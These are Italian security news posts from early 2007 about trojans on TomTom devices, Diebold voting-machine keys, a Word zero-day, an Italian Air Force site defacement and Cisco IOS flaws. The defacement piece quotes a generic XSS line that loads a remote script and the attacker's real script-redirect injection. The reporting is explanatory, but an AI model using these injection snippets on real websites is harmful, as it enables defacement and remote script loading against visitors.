Virus nella memoria di alcuni TomTom GO

Un piccolo numero di navigatori satellitari della ditta TomTom venduti nelle settimane scorse, secondo quanto riportato lo scorso week-end, conterrebbero dei virus.Una serie di TomTom GO910 prodotti tra Settembre e Novembre 2006 con versione software 6.51, come precisato dalla stessa TomTom, potrebbero essere “portatori sani” di virus. Win32.Perlovga.A e TR/Drop.Small.qp sono nascosti nei file host.exe e copy.exe che non fanno assolutamente parte del set di applicativi utilizzati dal dispositivo.

I due trojan non sono pericolosi e un comune anti-virus riesce a cancellarli senza problemi. E’ da sottolineare che i file infetti non intaccano assolutamente l’integrità e le funzioni del TomTom GO in quanto esso incorporta una sistema embedded Linux.
TomTom ha aggiunto:

Customers that do not have virus scanning software are advised to install virus scanning software.

Non è la prima volta che una grossa ditta distribuisce accessori tecnologici con virus che attaccano sistemi Windows: un anno fa vi fu il caso degli IPod che comprendevano il trojan Troj/Bdoor-DIJ nella loro memoria e meno di sei mesi fa il caso di Mc Donald’s in Giappone.

 

Create le chiavi di accesso al dispositivo per voto elettronico Diebold da una foto

Diebold KeysI dispositivi, Diebold, per il voto elettronico sono di nuovo sotto i riflettori per una gaffe sulla loro sicurezza dopo che un hacker è riuscito a creare la chiave, per aprire la macchina. Due delle tre chiavi create da Ross Kinard sono state capaci di aprire la macchina di Diebold, ricevuta dall’Università di Princeton per condurre dei test. Visti i risultati dell’attacco condotto è auspicabile che le serrature della macchina possano essere aperte da chiunque abbia un minimo di praticità con il lockpicking. Essendo la chiave corta ed ad unico profilo, è molto probabile che funzionino anche tecniche di bumping.
Diebold, subito dopo l’annuncio della compromissione della macchina ha rimosso l’immagine colpevole (sostituendola con quella di badge magnetico) dalla pagina del proprio sito web. Nella cache di Google è sempre presente una miniatura delle chiavi.

Il cassetto che si apre tramite l’uso della chiave da libero accesso alla memoria del dispositivo. In questo modo è possbile inserire memoria aggiuntiva contenente malware o virus. E’ altresì possibile alterare il software interno per falsare i conteggi elettorali. In verità, sopra la memoria della macchina c’è un nastro anti-manomissione, ma solo i responsabili di seggio sono addetti a questa verifica.

A rendere più critica la situazione è che la serratura è sempre la stessa tra macchine del solito modello.

 

Nuova vulnerabilità 0-day in Word 2000

Una vulnerabilità riscontrata in Microsoft Word permette l’esecuzione di codice arbitrario tramite un documento creato ad arte.
La vulnerabilità è causata da un non meglio specificato errore nell’interpretazione delle stringhe in un documento Word che portando alla corruzione della memoria, allocata da Microsoft Word, permette l’esecuzione di codice arbitrario sul sistema.

Il bug, secondo quanto detto da Microsoft, è riproducibile solamente su Word 2000 versione Mac inclusae e per ora non vi è nessuna patch per il bug. L’uico modo per difendersi è come al solito non aprire documenti provenienti da fondi non fidate o sicure.
La vulnerabilità 0-day è stata sfruttata la prima volta da Trojan.Mdropper.W, come segnalato da Symantec il 17 Gennaio scorso.

Intanto le altre 3 vulnerabilità presenti in Microsoft Word sono ancora senza patch da 53 (Word 0-day I), 48 (Word 0-day II), 43 (Word 12122006-djtest.doc) giorni.

 

Defacement ai danni del sito dell’Aeronautica Militare Italiana

Nella serata del 26 Gennaio è stato notificato a Zone-H un defacement ai danni del portale Web dell’Aeronautica Militare Italiana.

Un cracker turco, con il nick eno7, ha sfruttato una SQL Injection, per condurre un XSS defacement.
Un XSS defacement consiste nell’iniettare codice Javascript all’interno della pagina per modificarla dinamicamente o per redirezionare il visitatore verso un sito Web esterno. Ci sono vari modi per inserire funzioni o codice Javscript ad esempio il più classico e meno elaborato è <script src=”http://path.to/the/script.js”></script>.
E’ chiaro che molte volte, scovando XSS in variabili che valorizzeranno opzioni di tag HTML è necessario usare caratteri di escape o particolari codifiche alafanumeriche.

In questo caso il cracker ha inserito il codice in questo modo:

<img src=”/img/home_page/freccia.gif”
border=”0″>&nbsp;&nbsp;<a
href=”/sitoam/default.asp?idSez=33&idente=1400&idArg=&idNot=17222″
title=”Scade il
29/01/2007″><script>location=”http://www.eno7.org/peace/peace. html”</script></a>

Il cracker ha utilizzato l’attributo location per reindirizzare i visitatori verso http://www.eno7.org/peace/peace.html
In questo momento il Web Server dell’Aeronautica risulta down. Il deface può essere visto grazie al mirror di Zone-H.

 

Tre vulnerabilità critiche nell’IOS di Cisco

Sono stati rilasciati tre bollettini di sicurezza da parte di Cisco che interessano l’IOS (il sistema operativo usato nei suoi routers e switches).
Le tre falle possono causare un DoS e potenzialmente, una delle tre, permette anche l’esecuzione di codice arbitrario:

  • Crafted TCP Packet can cause denial of service” (cisco-sa-20070124-crafted-tcp) un errore all’interno del processo di analisi di un pacchetto IP può causare un eccessivo uso della memoria dinamica (memory leak) il che può portare ad un degrado delle prestazioni del dispositivo.
  • Crafted IP Option vulnerability” (cisco-sa-20070124-crafted-ip-option) un errore all’interno del processo di analisi delle opzioni di un pacchetto IP può portare al riavvio del dispositivo o del processo ipv4_io. Potenzialmente è possibile anche l’esecuzione di codice arbitrario grazie a dei valori, creati ad hoc, del campo delle opzioni del pacchetto IP.
  • IPv6 Routing Header vulnerability” (cisco-sa-20070124-IOS-IPv6) un errore nel processo di analisi dell’intestazione di un pacchetto IPv6 di routing, con Type 0, può portare al crash del dispositivo.

Cisco, oltre ad aver rilasciato i 3 bollettini di sicurezza, ha pubblicato anche 3 documenti che spiegano dettagliatamente come riconoscere e attenuare i danni causati da attacchi che sfruttano le vulnerabilità succitate:

Le tre vulnerabilità non sono da sottovalutare in quanto i routers e gli switches interessati dal problemi sono molto diffusi.